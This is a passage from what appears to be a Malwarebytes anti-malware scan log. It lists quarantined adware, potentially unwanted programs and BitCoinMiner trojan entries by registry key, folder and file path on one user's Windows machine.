    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\EpicNet Inc., Quarantined, [732], [451809],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON, Quarantined, [2805], [411133],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Quarantined, [797], [259987],1.0.9182
    Adware.Wajam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [494], [-1],0.0.0
    Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 1.0, Quarantined, [416], [533745],1.0.9182
    Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 2.0, Quarantined, [416], [533745],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Ebayssistant 1.0, Quarantined, [3714], [623237],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Look Picture Tool, Quarantined, [3714], [623238],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\telezilla, Quarantined, [3714], [623239],1.0.9182
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\wewewe, Quarantined, [688], [339689],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME, Quarantined, [2805], [411132],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Quarantined, [797], [259989],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION, Quarantined, [446], [518477],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASAPI32, Quarantined, [779], [568552],1.0.9182
    Adware.Tuto4PC, HKLM\SOFTWARE\Foldershare, Quarantined, [2805], [536223],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASMANCS, Quarantined, [779], [568552],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Polygen.exe, Quarantined, [779], [568551],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\bestavicampaign563, Quarantined, [446], [584322],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, Quarantined, [446], [518478],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, Quarantined, [446], [518476],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\Speedycar, Quarantined, [446], [518473],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\TechnologyDesktopnew, Quarantined, [446], [518479],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\hjuzju, Quarantined, [6000], [622124],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182

    Registry Value: 36
    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CloudNet, Quarantined, [732], [512160],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON|PARTNER, Quarantined, [2805], [411133],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Quarantined, [797], [259987],1.0.9182
    Adware.Wajam, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Quarantined, [797], [259988],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8222286, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WK27HXJEIFMX6EE, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8735117, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|T9KTUNJFV82076N, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9428290, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|U943W0QT19CB97H, Quarantined, [3707], [392931],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [259517],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNP, Quarantined, [797], [259518],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|3525589, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|URD8WCW2ZCRHWKK, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|NNHJYS7S607ZBCR, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9236653, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8581968, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|44K3AH7DLU628F4, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|5608956, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|1293914, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME|PARTNER, Quarantined, [2805], [411132],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Quarantined, [797], [259989],1.0.9182
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Quarantined, [252], [259314],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION|VERSION, Quarantined, [446], [518477],1.0.9182
    PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Quarantined, [252], [259313],1.0.9182
    Trojan.BitCoinMiner.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CHROME, Quarantined, [3755], [525944],1.0.9182
    PUP.Optional.CloudNet, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{11A88E17-3A04-4D89-B347-E025C0716D1A}, Quarantined, [6124], [446028],1.0.9182
    PUP.Optional.BazzSearch, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|nmeinlfojlcegblpogpjbhipmonclejh, Quarantined, [225], [550044],1.0.9182

    Registry Data: 7
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293476],1.0.9182
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293477],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Replaced, [797], [293486],1.0.9182

    Data Stream: 0
    (No malicious items detected)

    Folder: 36
    PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS, Quarantined, [6124], [448845],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL, Quarantined, [2805], [487473],1.0.9182
    RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc, Quarantined, [732], [512160],1.0.9182
    Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE, Quarantined, [2805], [474043],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2, Quarantined, [6100], [635578],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp, Quarantined, [494], [511084],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectronCash, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectrumLTC, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\MultiDoge, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Electrum, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Ethereum, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Exodus, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\JAXX, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\PROGRAMDATA\VMR6PC5JA6GYC9V0XH3B\FILES\Wallets, Quarantined, [602], [628365],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q, Quarantined, [3707], [404610],1.0.9182

    File: 140
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Joybam.tst, Quarantined, [3745], [404871],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Silsoning.tst, Quarantined, [3745], [404871],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\NOAH.DAT, Quarantined, [3745], [404865],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MD.XML, Quarantined, [3745], [404866],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\AGENT.DAT, Quarantined, [3745], [404872],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\UNINSTALL_TEMP.ICO, Quarantined, [3745], [404862],1.0.9182
    PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\updateprofile-0128.exe, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
    Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Quarantined, [416], [455564],1.0.9182
    Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, Quarantined, [416], [430694],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MAIN.DAT, Quarantined, [3745], [442900],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516189],1.0.9182
    RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc\CLOUDNET\cloudnet.exe, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\tmp7FE1.tmp, Quarantined, [732], [512160],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516191],1.0.9182
    Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE\FOLDERSHARE.EXE.CONFIG, Quarantined, [2805], [474043],1.0.9182
    Adware.Tuto4PC, C:\Program Files (x86)\foldershare\foldershare.exe, Quarantined, [2805], [474043],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2\BundleConfig.xml, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
